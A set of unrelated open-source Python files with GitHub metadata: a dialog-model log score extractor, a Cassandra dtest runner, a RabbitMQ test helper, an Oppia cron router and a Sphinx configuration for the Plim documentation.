"path": "azure-mgmt-servicebus/azure/mgmt/servicebus/models/resource.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
}
|
''' Description : Extract performance scores from the log folder, and print them in tables
Author : Xuesong Yang
Email : xyang45@illinois.edu
Created Date: Dec.31, 2016
'''
import re
from prettytable import PrettyTable
def getScore(fname, prefix=''):
score_lst = list()
with open(fname, 'rb') as f:
for line in f:
m = re.match(r'{}precision=(?P<precision>.*), recall=(?P<recall>.*), fscore=(?P<fscore>.*), accuracy_frame=(?P<accuracy_frame>.*)'.format(prefix), line)
if m is not None:
score_dct = {key: val for (key, val) in m.groupdict().iteritems()}
score_lst.append(score_dct)
return score_lst
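# Example of a log line matched by getScore() (format inferred from the regex above;
# the prefix and numbers are illustrative):
#   SlotTagging: precision=0.9123, recall=0.8876, fscore=0.8998, accuracy_frame=0.7321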
def baselineScore(fname):
names_lst = ['oracle_act', 'nlu_tag', 'nlu_intent', 'policy']
score_lst = getScore(fname, prefix='\t')
scores = {key: val for (key, val) in zip(names_lst, score_lst)}
return scores
def jointModelScore(fname_tag, fname_intent, fname_act):
names_lst = ['nlu_tag', 'nlu_intent', 'policy']
score_tag = getScore(fname_tag, prefix='SlotTagging: ')
score_intent = getScore(fname_intent, prefix='IntentPred: ')
score_act = getScore(fname_act, prefix='AgentActPred: ')
score_all = score_tag + score_intent + score_act
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def slotTaggingScore(fname_tag, fname_intent):
names_lst = ['nlu_tag', 'nlu_intent']
score_tag = getScore(fname_tag, prefix='SlotTagging: ')
score_intent = getScore(fname_intent, prefix='IntentPred: ')
score_all = score_tag + score_intent
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def bilstmOracleScore(fname):
score_lst = getScore(fname, prefix='AgentActPred: ')
return {'policy': score_lst[0]}
def pipelineBilstmScore(fname):
names_lst = ['nlu_tag', 'nlu_intent', 'policy']
score_tag = getScore(fname, prefix='SlotTagging: ')
score_intent = getScore(fname, prefix='IntentPred: ')
score_act = getScore(fname, prefix='AgentActPred: ')
score_all = score_tag + score_intent + score_act
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def getFrameScore(tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname):
hit = 0.
sample_nb = 0.
with open(tag_pred_fname, 'rb') as tag_fpred, open(tag_target_fname, 'rb') as tag_ftarget,\
open(intent_pred_fname, 'rb') as intent_fpred, open(intent_target_fname, 'rb') as intent_ftarget:
for (tag_pred, tag_target, intent_pred, intent_target) in zip(tag_fpred, tag_ftarget, intent_fpred, intent_ftarget):
sample_nb += 1.
i_pred = sorted(set(intent_pred.split(';')))
i_target = sorted(set(intent_target.split(';')))
if (i_pred == i_target) and (tag_pred == tag_target):
hit += 1.
accuracy_frame = hit / sample_nb
return accuracy_frame
def nluFrameScore(baseline_fname, pipeline_fname, joint_tag_fname, joint_intent_fname):
acc_frame = dict()
baseline_tag_pred_fname, baseline_tag_target_fname, baseline_intent_pred_fname, baseline_intent_target_fname = getBaselineFnames(baseline_fname)
baseline_AccFr = getFrameScore(baseline_tag_pred_fname, baseline_tag_target_fname, baseline_intent_pred_fname, baseline_intent_target_fname)
acc_frame['Baseline'] = '{:.4f}'.format(baseline_AccFr)
pipe_tag_pred_fname, pipe_tag_target_fname, pipe_intent_pred_fname, pipe_intent_target_fname = getPipelineFnames(pipeline_fname)
pipeline_AccFr = getFrameScore(pipe_tag_pred_fname, pipe_tag_target_fname, pipe_intent_pred_fname, pipe_intent_target_fname)
acc_frame['Pipeline'] = '{:.4f}'.format(pipeline_AccFr)
joint_tag_pred_fname, joint_tag_target_fname = getFname(joint_tag_fname, prefix='tag')
joint_intent_pred_fname, joint_intent_target_fname = getFname(joint_intent_fname, prefix='intent')
joint_AccFr = getFrameScore(joint_tag_pred_fname, joint_tag_target_fname, joint_intent_pred_fname, joint_intent_target_fname)
acc_frame['JointModel'] = '{:.4f}'.format(joint_AccFr)
return acc_frame
def getFname(fname, prefix=''):
pred_fname = ''
target_fname = ''
with open(fname, 'rb') as f:
for line in f:
m = re.match(r'\t{0}_target=(?P<{0}_target>.*)'.format(prefix), line)
if m is not None:
target_fname = m.group('{}_target'.format(prefix))
continue
else:
m = re.match(r'\t{0}_pred=(?P<{0}_pred>.*)'.format(prefix), line)
if m is not None:
pred_fname = m.group('{}_pred'.format(prefix))
assert target_fname != '' and pred_fname != '', 'Can not find file name.'
return (pred_fname, target_fname)
def getPipelineFnames(pipeline_fname):
tag_target_fname = ''
tag_pred_fname = ''
intent_target_fname = ''
intent_pred_fname = ''
with open(pipeline_fname, 'rb') as f:
for line in f:
m = re.match(r'\ttag_target=(?P<tag_target>.*)', line)
if m is not None:
tag_target_fname = m.group('tag_target')
continue
else:
m = re.match(r'\ttag_pred=(?P<tag_pred>.*)', line)
if m is not None:
tag_pred_fname = m.group('tag_pred')
continue
else:
m = re.match(r'\tintent_pred=(?P<intent_pred>.*)', line)
if m is not None:
intent_pred_fname = m.group('intent_pred')
continue
else:
m = re.match(r'\tintent_target=(?P<intent_target>.*)', line)
if m is not None:
intent_target_fname = m.group('intent_target')
assert tag_target_fname != '' and tag_pred_fname != '' and intent_target_fname != '' and intent_pred_fname != '', 'Can not find file name.'
return (tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname)
def getBaselineFnames(baseline_fname):
tag_target_fname = ''
tag_pred_fname = ''
intent_target_fname = ''
intent_pred_fname = ''
with open(baseline_fname, 'rb') as f:
for line in f:
m = re.match(r'\ttag_target=(?P<tag_target>.*)', line)
if m is not None:
tag_target_fname = m.group('tag_target')
continue
else:
m = re.match(r'\ttag_pred=(?P<tag_pred>.*)', line)
if m is not None:
tag_pred_fname = m.group('tag_pred')
continue
else:
m = re.match(r'\ttest_pred=(?P<intent_pred>.*pipeline_intent-test.pred)', line)
if m is not None:
intent_pred_fname = m.group('intent_pred')
continue
else:
m = re.match(r'\ttest_target=(?P<intent_target>.*pipeline_intent-test.target)', line)
if m is not None:
intent_target_fname = m.group('intent_target')
assert tag_target_fname != '' and tag_pred_fname != '' and intent_target_fname != '' and intent_pred_fname != '', 'Can not find file name.'
return (tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname)
def tableEnd2End(baseline, pipeline, jointModel, bilstmOracle):
table = PrettyTable()
table.field_names = ['Models', 'Fscore', 'Precision', 'Recall', 'Accuracy_Frame']
table.align['Models'] = 'l'
table.add_row(['Baseline(CRF+SVMs+SVMs)', baseline['policy']['fscore'], baseline['policy']['precision'], baseline['policy']['recall'], baseline['policy']['accuracy_frame']])
table.add_row(['Pipeline(biLSTM+biLSTM+biLSTM)', pipeline['policy']['fscore'], pipeline['policy']['precision'], pipeline['policy']['recall'], pipeline['policy']['accuracy_frame']])
table.add_row(['JointModel(biLSTM+biLSTM+biLSTM)', jointModel['policy']['fscore'], jointModel['policy']['precision'], jointModel['policy']['recall'], jointModel['policy']['accuracy_frame']])
table.add_row(['Oracle(SVMs)', baseline['oracle_act']['fscore'], baseline['oracle_act']['precision'], baseline['oracle_act']['recall'], baseline['oracle_act']['accuracy_frame']])
table.add_row(['Oracle(biLSTM)', bilstmOracle['policy']['fscore'], bilstmOracle['policy']['precision'], bilstmOracle['policy']['recall'], bilstmOracle['policy']['accuracy_frame']])
return table
def tableNLU(baseline, pipeline, jointModel, frame):
table = PrettyTable()
table.field_names = ['Models', 'tagF', 'tagP', 'tagR', 'tagAccFr', 'intF', 'intP', 'intR', 'intAccFr', 'nluAccFr']
table.align['Models'] = 'l'
table.add_row(['Baseline', baseline['nlu_tag']['fscore'], baseline['nlu_tag']['precision'], baseline['nlu_tag']['recall'], baseline['nlu_tag']['accuracy_frame'], baseline['nlu_intent']['fscore'], baseline['nlu_intent']['precision'], baseline['nlu_intent']['recall'], baseline['nlu_intent']['accuracy_frame'], frame['Baseline']])
table.add_row(['Pipeline', pipeline['nlu_tag']['fscore'], pipeline['nlu_tag']['precision'], pipeline['nlu_tag']['recall'], pipeline['nlu_tag']['accuracy_frame'], pipeline['nlu_intent']['fscore'], pipeline['nlu_intent']['precision'], pipeline['nlu_intent']['recall'], pipeline['nlu_intent']['accuracy_frame'], frame['Pipeline']])
table.add_row(['JointModel', jointModel['nlu_tag']['fscore'], jointModel['nlu_tag']['precision'], jointModel['nlu_tag']['recall'], jointModel['nlu_tag']['accuracy_frame'], jointModel['nlu_intent']['fscore'], jointModel['nlu_intent']['precision'], jointModel['nlu_intent']['recall'], jointModel['nlu_intent']['accuracy_frame'], frame['JointModel']])
return table
if __name__ == '__main__':
baseline = './log/nohup_baseline_test.log'
pipelineBilstm = './log/nohup_pipelineBiLSTM_test.log'
jointModel_tag = './log/nohup_jointModel_tag_test.log'
jointModel_intent = './log/nohup_jointModel_intent_test.log'
jointModel_act = './log/nohup_jointModel_act_test.log'
slotTagging_intent = './log/nohup_slotTagging_intent_test.log'
slotTagging_tag = './log/nohup_slotTagging_tag_test.log'
agentAct_oracle = './log/nohup_agentAct_oracle_test.log'
scores_baseline = baselineScore(baseline)
# print(scores_baseline)
scores_jointModel = jointModelScore(jointModel_tag, jointModel_intent, jointModel_act)
# print(scores_jointModel)
scores_slotTagging = slotTaggingScore(slotTagging_tag, slotTagging_intent)
#print(scores_slotTagging)
scores_bilstmOracle = bilstmOracleScore(agentAct_oracle)
#print(scores_bilstmOracle)
scores_pipelineBilstm = pipelineBilstmScore(pipelineBilstm)
#print(scores_pipelineBilstm)
scores_frame = nluFrameScore(baseline, pipelineBilstm, jointModel_tag, jointModel_intent)
#print(scores_frame)
end2end_table = tableEnd2End(scores_baseline, scores_pipelineBilstm, scores_jointModel, scores_bilstmOracle)
    print('Table 1 Performance of End2End Models')
print(end2end_table)
print('\n\n')
nlu_table = tableNLU(scores_baseline, scores_pipelineBilstm, scores_jointModel, scores_frame)
    print('Table 2 Performance of NLU Models')
print(nlu_table)
|
{
"content_hash": "bae11f446182f0a1fc09c8d8b032c1c6",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 352,
"avg_line_length": 50.415929203539825,
"alnum_prop": 0.6248902931367386,
"repo_name": "XuesongYang/end2end_dialog",
"id": "2870acbb715c91167eab89ebb756b56bc8876d76",
"size": "11394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analyze_log.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140516"
},
{
"name": "Shell",
"bytes": "7058"
}
],
"symlink_target": ""
}
|
"""
usage: run_dtests.py [-h] [--use-vnodes] [--use-off-heap-memtables] [--num-tokens NUM_TOKENS] [--data-dir-count-per-instance DATA_DIR_COUNT_PER_INSTANCE] [--force-resource-intensive-tests]
[--skip-resource-intensive-tests] [--cassandra-dir CASSANDRA_DIR] [--cassandra-version CASSANDRA_VERSION] [--delete-logs] [--execute-upgrade-tests] [--disable-active-log-watching]
[--keep-test-dir] [--enable-jacoco-code-coverage] [--dtest-enable-debug-logging] [--dtest-print-tests-only] [--dtest-print-tests-output DTEST_PRINT_TESTS_OUTPUT]
[--pytest-options PYTEST_OPTIONS] [--dtest-tests DTEST_TESTS]
optional arguments:
-h, --help show this help message and exit
  --use-vnodes Determines whether or not to set up clusters using vnodes for tests (default: False)
--use-off-heap-memtables Enable Off Heap Memtables when creating test clusters for tests (default: False)
--num-tokens NUM_TOKENS Number of tokens to set num_tokens yaml setting to when creating instances with vnodes enabled (default: 256)
--data-dir-count-per-instance DATA_DIR_COUNT_PER_INSTANCE Control the number of data directories to create per instance (default: 3)
--force-resource-intensive-tests Forces the execution of tests marked as resource_intensive (default: False)
--skip-resource-intensive-tests Skip all tests marked as resource_intensive (default: False)
--cassandra-dir CASSANDRA_DIR
--cassandra-version CASSANDRA_VERSION
--delete-logs
--execute-upgrade-tests Execute Cassandra Upgrade Tests (e.g. tests annotated with the upgrade_test mark) (default: False)
--disable-active-log-watching Disable ccm active log watching, which will cause dtests to check for errors in the logs in a single operation instead of semi-realtime
processing by consuming ccm _log_error_handler callbacks (default: False)
  --keep-test-dir Do not remove/clean up the test ccm cluster directory and its artifacts after the test completes (default: False)
--enable-jacoco-code-coverage Enable JaCoCo Code Coverage Support (default: False)
--dtest-enable-debug-logging Enable debug logging (for this script, pytest, and during execution of test functions) (default: False)
--dtest-print-tests-only Print list of all tests found eligible for execution given the provided options. (default: False)
--dtest-print-tests-output DTEST_PRINT_TESTS_OUTPUT Path to file where the output of --dtest-print-tests-only should be written to (default: False)
--pytest-options PYTEST_OPTIONS Additional command line arguments to proxy directly thru when invoking pytest. (default: None)
--dtest-tests DTEST_TESTS Comma separated list of test files, test classes, or test methods to execute. (default: None)
"""
import subprocess
import sys
import os
import re
import logging
from os import getcwd
from tempfile import NamedTemporaryFile
from bs4 import BeautifulSoup
from _pytest.config import Parser
import argparse
from conftest import pytest_addoption
logger = logging.getLogger(__name__)
class RunDTests():
def run(self, argv):
parser = argparse.ArgumentParser(formatter_class=lambda prog: argparse.ArgumentDefaultsHelpFormatter(prog,
max_help_position=100,
width=200))
# this is a bit ugly: all of our command line arguments are added and configured as part
# of pytest. however, we also have this wrapper script to make it easier for those who
# aren't comfortable calling pytest directly. To avoid duplicating code (e.g. have the options
# in two separate places) we directly use the pytest_addoption fixture from conftest.py. Unfortunately,
# pytest wraps ArgumentParser, so, first we add the options to a pytest Parser, and then we pull
# all of those custom options out and add them to the unwrapped ArgumentParser we want to use
# here inside of run_dtests.py.
#
# So NOTE: to add a command line argument, if you're trying to do so by adding it here, you're doing it wrong!
# add it to conftest.py:pytest_addoption
pytest_parser = Parser()
pytest_addoption(pytest_parser)
# add all of the options from the pytest Parser we created, and add them into our ArgumentParser instance
pytest_custom_opts = pytest_parser._anonymous
for opt in pytest_custom_opts.options:
parser.add_argument(opt._long_opts[0], action=opt._attrs['action'],
default=opt._attrs.get('default', None),
help=opt._attrs.get('help', None))
parser.add_argument("--dtest-enable-debug-logging", action="store_true", default=False,
help="Enable debug logging (for this script, pytest, and during execution "
"of test functions)")
parser.add_argument("--dtest-print-tests-only", action="store_true", default=False,
help="Print list of all tests found eligible for execution given the provided options.")
parser.add_argument("--dtest-print-tests-output", action="store", default=False,
help="Path to file where the output of --dtest-print-tests-only should be written to")
parser.add_argument("--pytest-options", action="store", default=None,
help="Additional command line arguments to proxy directly thru when invoking pytest.")
parser.add_argument("--dtest-tests", action="store", default=None,
help="Comma separated list of test files, test classes, or test methods to execute.")
args = parser.parse_args()
if not args.dtest_print_tests_only and args.cassandra_dir is None:
if args.cassandra_version is None:
raise Exception("Required dtest arguments were missing! You must provide either --cassandra-dir "
"or --cassandra-version. Refer to the documentation or invoke the help with --help.")
if args.dtest_enable_debug_logging:
logging.root.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Get dictionaries corresponding to each point in the configuration matrix
# we want to run, then generate a config object for each of them.
logger.debug('Generating configurations from the following matrix:\n\t{}'.format(args))
args_to_invoke_pytest = []
if args.pytest_options:
for arg in args.pytest_options.split(" "):
args_to_invoke_pytest.append("'{the_arg}'".format(the_arg=arg))
for arg in argv:
if arg.startswith("--pytest-options") or arg.startswith("--dtest-"):
continue
args_to_invoke_pytest.append("'{the_arg}'".format(the_arg=arg))
if args.dtest_print_tests_only:
args_to_invoke_pytest.append("'--collect-only'")
if args.dtest_tests:
for test in args.dtest_tests.split(","):
args_to_invoke_pytest.append("'{test_name}'".format(test_name=test))
original_raw_cmd_args = ", ".join(args_to_invoke_pytest)
logger.debug("args to call with: [%s]" % original_raw_cmd_args)
# the original run_dtests.py script did it like this to hack around nosetest
# limitations -- i'm not sure if they still apply or not in a pytest world
# but for now just leaving it as is, because it does the job (although
# certainly is still pretty complicated code and has a hacky feeling)
to_execute = (
"import pytest\n" +
(
"pytest.main([{options}])\n").format(options=original_raw_cmd_args)
)
temp = NamedTemporaryFile(dir=getcwd())
logger.debug('Writing the following to {}:'.format(temp.name))
logger.debug('```\n{to_execute}```\n'.format(to_execute=to_execute))
temp.write(to_execute.encode("utf-8"))
temp.flush()
# We pass nose_argv as options to the python call to maintain
# compatibility with the nosetests command. Arguments passed in via the
# command line are treated one way, args passed in as
# nose.main(argv=...) are treated another. Compare with the options
# -xsv for an example.
cmd_list = [sys.executable, temp.name]
logger.debug('subprocess.call-ing {cmd_list}'.format(cmd_list=cmd_list))
sp = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=os.environ.copy())
if args.dtest_print_tests_only:
stdout, stderr = sp.communicate()
if stderr:
print(stderr.decode("utf-8"))
result = sp.returncode
exit(result)
all_collected_test_modules = collect_test_modules(stdout)
joined_test_modules = "\n".join(all_collected_test_modules)
#print("Collected %d Test Modules" % len(all_collected_test_modules))
            if args.dtest_print_tests_output:
collected_tests_output_file = open(args.dtest_print_tests_output, "w")
collected_tests_output_file.write(joined_test_modules)
collected_tests_output_file.close()
print(joined_test_modules)
else:
while True:
stdout_output = sp.stdout.readline()
stdout_output_str = stdout_output.decode("utf-8")
if stdout_output_str == '' and sp.poll() is not None:
break
if stdout_output_str:
print(stdout_output_str.strip())
stderr_output = sp.stderr.readline()
stderr_output_str = stderr_output.decode("utf-8")
if stderr_output_str == '' and sp.poll() is not None:
break
if stderr_output_str:
print(stderr_output_str.strip())
exit(sp.returncode)
def collect_test_modules(stdout):
"""
Takes the xml-ish (no, it's not actually xml so we need to format it a bit) --collect-only output as printed
by pytest to stdout and normalizes it to get a list of all collected tests in a human friendly format
:param stdout: the stdout from pytest (should have been invoked with the --collect-only cmdline argument)
:return: a formatted list of collected test modules in format test_file.py::TestClass::test_function
"""
# unfortunately, pytest emits xml like output -- but it's not actually xml, so we'll fail to parse
# if we try. first step is to fix up the pytest output to create well formatted xml
xml_line_regex_pattern = re.compile("^([\s])*<(Module|Class|Function|Instance) '(.*)'>")
is_first_module = True
is_first_class = True
has_closed_class = False
section_has_instance = False
section_has_class = False
test_collect_xml_lines = []
test_collect_xml_lines.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>")
test_collect_xml_lines.append("<Modules>")
for line in stdout.decode("utf-8").split('\n'):
re_ret = re.search(xml_line_regex_pattern, line)
if re_ret:
if not is_first_module and re_ret.group(2) == "Module":
if section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if section_has_class:
test_collect_xml_lines.append(" </Class>")
test_collect_xml_lines.append(" </Module>")
is_first_class = True
                has_closed_class = False
section_has_instance = False
section_has_class = False
is_first_module = False
elif is_first_module and re_ret.group(2) == "Module":
if not has_closed_class and section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if not has_closed_class and section_has_class:
test_collect_xml_lines.append(" </Class>")
is_first_class = True
is_first_module = False
has_closed_class = False
section_has_instance = False
section_has_class = False
elif re_ret.group(2) == "Instance":
section_has_instance = True
elif not is_first_class and re_ret.group(2) == "Class":
if section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if section_has_class:
test_collect_xml_lines.append(" </Class>")
has_closed_class = True
section_has_class = True
elif re_ret.group(2) == "Class":
is_first_class = False
section_has_class = True
has_closed_class = False
if re_ret.group(2) == "Function":
test_collect_xml_lines.append(" <Function name=\"{name}\"></Function>"
.format(name=re_ret.group(3)))
elif re_ret.group(2) == "Class":
test_collect_xml_lines.append(" <Class name=\"{name}\">".format(name=re_ret.group(3)))
elif re_ret.group(2) == "Module":
test_collect_xml_lines.append(" <Module name=\"{name}\">".format(name=re_ret.group(3)))
elif re_ret.group(2) == "Instance":
test_collect_xml_lines.append(" <Instance name=\"\">".format(name=re_ret.group(3)))
else:
test_collect_xml_lines.append(line)
test_collect_xml_lines.append(" </Instance>")
test_collect_xml_lines.append(" </Class>")
test_collect_xml_lines.append(" </Module>")
test_collect_xml_lines.append("</Modules>")
all_collected_test_modules = []
# parse the now valid xml
print("\n".join(test_collect_xml_lines))
test_collect_xml = BeautifulSoup("\n".join(test_collect_xml_lines), "lxml-xml")
# find all Modules (followed by classes in those modules, and then finally functions)
for pytest_module in test_collect_xml.findAll("Module"):
for test_class_name in pytest_module.findAll("Class"):
for function_name in test_class_name.findAll("Function"):
# adds to test list in format like test_file.py::TestClass::test_function for every test function found
all_collected_test_modules.append("{module_name}::{class_name}::{function_name}"
.format(module_name=pytest_module.attrs['name'],
class_name=test_class_name.attrs['name'],
function_name=function_name.attrs['name']))
return all_collected_test_modules
if __name__ == '__main__':
RunDTests().run(sys.argv[1:])
|
{
"content_hash": "8795460a44d47b1163d7a855170bbc76",
"timestamp": "",
"source": "github",
"line_count": 279,
"max_line_length": 200,
"avg_line_length": 56.31182795698925,
"alnum_prop": 0.5923238495321749,
"repo_name": "beobal/cassandra-dtest",
"id": "198cde2adc253f6d3400b2b3f34c964cba029f51",
"size": "15733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "run_dtests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2693025"
},
{
"name": "Shell",
"bytes": "2061"
}
],
"symlink_target": ""
}
|
import os
from kombu import BrokerConnection
from kombu import Exchange
from kombu.pools import producers
from kombu.common import maybe_declare
class RabbitMqHelper(object):
def __init__(self):
is_container = True if os.environ.get('TEST_CONTAINER') else False
hostname = "messaging" if is_container else "127.0.0.1"
amqp_url = "amqp://guest:guest@{url}:{port}".format(url=hostname, port=5672)
self.task_exchange = Exchange("almanach.info", type="topic")
self.connection = BrokerConnection(amqp_url)
def push(self, message):
with producers[self.connection].acquire(block=True) as producer:
maybe_declare(self.task_exchange, producer.channel)
producer.publish(message, routing_key="almanach.info")
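# Hedged usage sketch (the payload is illustrative and a reachable broker is assumed):
#
#   helper = RabbitMqHelper()
#   helper.push({"event": "instance.created"})  # published on the almanach.info topic exchange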
|
{
"content_hash": "bb8067c26fbb7bc786ee16f212b08236",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 84,
"avg_line_length": 39.1,
"alnum_prop": 0.6956521739130435,
"repo_name": "internap/almanach",
"id": "8f043f456c06a8116a816c102a30e833c002e980",
"size": "1356",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integration_tests/helpers/rabbit_mq_helper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "298040"
},
{
"name": "Shell",
"bytes": "277"
}
],
"symlink_target": ""
}
|
"""Main package for URL routing and the index page."""
# pylint: disable=relative-import
from core.controllers import cron
from core.platform import models
import feconf
import main
import webapp2
# pylint: enable=relative-import
transaction_services = models.Registry.import_transaction_services()
# Register the URLs with the classes responsible for handling them.
URLS = [
main.get_redirect_route(
r'/cron/mail/admin/job_status', cron.JobStatusMailerHandler),
main.get_redirect_route(
r'/cron/users/dashboard_stats', cron.CronDashboardStatsHandler),
main.get_redirect_route(
r'/cron/explorations/recommendations',
cron.CronExplorationRecommendationsHandler),
main.get_redirect_route(
r'/cron/explorations/search_rank',
cron.CronActivitySearchRankHandler),
main.get_redirect_route(
r'/cron/jobs/cleanup', cron.CronMapreduceCleanupHandler),
main.get_redirect_route(
r'/cron/suggestions/accept_stale_suggestions',
cron.CronAcceptStaleSuggestionsHandler),
]
app = transaction_services.toplevel_wrapper( # pylint: disable=invalid-name
webapp2.WSGIApplication(URLS, debug=feconf.DEBUG))
|
{
"content_hash": "6ea0ab187ce43a4ec492fca3a860a100",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 76,
"avg_line_length": 33.111111111111114,
"alnum_prop": 0.7390939597315436,
"repo_name": "AllanYangZhou/oppia",
"id": "87a9353cb9b53b6a5409563db8411993d757da83",
"size": "1797",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "main_cron.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "82690"
},
{
"name": "HTML",
"bytes": "1128088"
},
{
"name": "JavaScript",
"bytes": "3945933"
},
{
"name": "Python",
"bytes": "4888439"
},
{
"name": "Shell",
"bytes": "50051"
}
],
"symlink_target": ""
}
|
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Plim'
copyright = u'2014, Maxim Avanov'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9.11'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Plimdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Plim.tex', u'Plim Documentation',
u'Maxim Avanov', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'plim', u'Plim Documentation',
[u'Maxim Avanov'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Plim', u'Plim Documentation',
u'Maxim Avanov', 'Plim', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'Plim'
epub_author = u'Maxim Avanov'
epub_publisher = u'Maxim Avanov'
epub_copyright = u'2014, Maxim Avanov'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
